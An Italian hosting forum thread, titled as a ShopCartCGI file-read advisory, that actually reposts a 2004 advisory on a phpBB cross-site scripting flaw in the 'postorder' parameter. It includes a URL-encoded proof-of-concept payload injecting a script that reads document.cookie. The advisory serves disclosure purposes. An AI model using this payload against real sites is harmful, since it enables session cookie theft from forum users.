Torna indietro   Serverplan Forum > Serverplan comunica > Vulnerabilità
ShopCartCGI v2.3 lettura remota di file arbitrari ShopCartCGI v2.3 lettura remota di file arbitrari
Registrazione FAQ Lista utenti Calendario Cerca I messaggi di oggi Segna forums come letti

Rispondi
 
LinkBack Strumenti discussione Modalità visualizzazione
  #1 (permalink)  
Vecchio 15-06-2007, 21.32.41
Member
  
Data registrazione: 28-05-2007
Messaggi: 32
Ikarosavenger_79 is on a distinguished road
Predefinito ShopCartCGI v2.3 lettura remota di file arbitrari
################################################

Advisory NameNew phpBB ViewTopic.php Cross Site Scripting Vulnerability

Release Date Feb 29,2004

Application phpBB

Platform PHP

Version Affected the lastest version

Vendor URL //phpbb/

Discover Cheng Peng Su(apple_soup_at_msn)

################################################



Details

This vuln is similar to Arab VieruZ's advisory 'XSS bug in phpBB',this time the problem is not in 'highlight' ,but in 'postorder'.we can inject HTML code,such code could be used to steal cookie information.



Proof of Concept

If there is a topic at

//site/phpBB/viewtopic.php?t=123456

this page can be also viewed at

//site/phpBB/viewtopic.php?t=123456&postorder=asc

then this page will contain code like below

<a class="maintitle" href="viewtopic.php?t=176994&start=0&a mp;postdays=0&postorder=asc&highli ght=">[Topic Title]</a>.

phpBB doesn't filter out illegal characters from 'postorder',so we can inject HTML code after 'postorder='.



Exploit

URL //site/phpBB/viewtopic.php?t=123456&postorder=%22%3E%3C%73% 63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D %65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%6 9%70%74%3E%3C



note unescape('=%22%3E%3C%73%63%72%69%70%74%3E%61%6C%65 %72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%6 9%65%29%3C%2F%73%63%72%69%70%74%3E%3C') == '"><script>alert(document.cookie) </script><'



Contact

Cheng Peng Su

apple_soup_at_msn

Class 1,Senior 2,High school attached to Wuhan University

Wuhan,Hubei,China_________________Faq - Contratti - Video Tutorial

starwars free starwars mmorpg
mirrorpedia hellwars mmorpg
Rispondi citando
Rispondi

« Discussione precedente | Prossima discussione »
Strumenti discussione
Modalità visualizzazione
Modalità lineare Modalità lineare

Regole di scrittura
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts
BB code is Attivato
Le faccine sono Attivato
Il codice [IMG] è Attivato
Il codice HTML è Disattivato
Trackbacks are Attivato
Pingbacks are Attivato
Refbacks are Attivato


Discussioni simili
Discussione Autore discussione Forum Risposte Ultimo messaggio
Errore in upload file con file manager NetMassimo Pannello di controllo Cpanel - Linux 2 07-03-2008 10.42.04
ShopCartCGI v2.3 lettura remota di file arbitrari Ikarosavenger_79 Vulnerabilità 0 12-06-2007 01.56.32
Indirizzo di default lettura mail in HORDE dea_informatica Pannello di controllo Cpanel - Linux 1 28-06-2006 17.19.33
Lettura file di log di grandi dimensioni - come fare? Davide2 PHP 4 28-10-2005 11.14.40
ShopCartCGI v2.3 lettura remota di file arbitrari serverplan Vulnerabilità 0 17-02-2004 11.55.11


Tutti gli orari sono GMT +1. Adesso sono le 15.52.13.

Contatta staff - Archivio - Inizio pagina

Powered by vBulletin versione 3.7.3
Copyright ©2000 - 2008, Jelsoft Enterprises Ltd.
Content Relevant URLs by vBSEO 3.1.0
Traduzione italiana : www.vbulletin.it